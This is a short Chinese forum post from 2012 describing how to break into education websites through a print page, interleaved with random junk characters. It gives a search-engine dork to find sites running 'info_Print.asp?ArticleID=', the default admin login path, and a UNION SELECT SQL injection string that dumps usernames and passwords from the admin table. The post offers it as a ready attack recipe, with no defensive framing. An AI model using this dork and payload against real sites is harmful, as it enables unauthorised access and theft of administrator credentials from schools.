教育站打印页面漏洞
/ b, S0 i: D; I1 M百度或google搜索 inurl:info_Print.asp?ArticleID=; r& B0 u+ ^) l5 ?* E
默认后台:/ad_login.asp
1 C# l1 t# Z- S8 T+ U/ K爆管理员密码:% w3 `, Y9 Q* ?
在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可, k0 |/ }3 j7 R4 k) c9 K
: I2 O2 I, i1 i6 {+ o- wunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin* p9 Q0 f# C c' z! R( v* k! [
" F; ]4 M; W# @. g( L' Y5 G. L作者:佚名
- |1 ^4 K8 y, ^/ T9 v ( ^, Y$ d9 s( T3 H, o+ J! {! T
( z" Z! ?+ H' R. a/ L9 b1 J
|
发表于 2012-10-31 08:37:31
收藏
支持
反对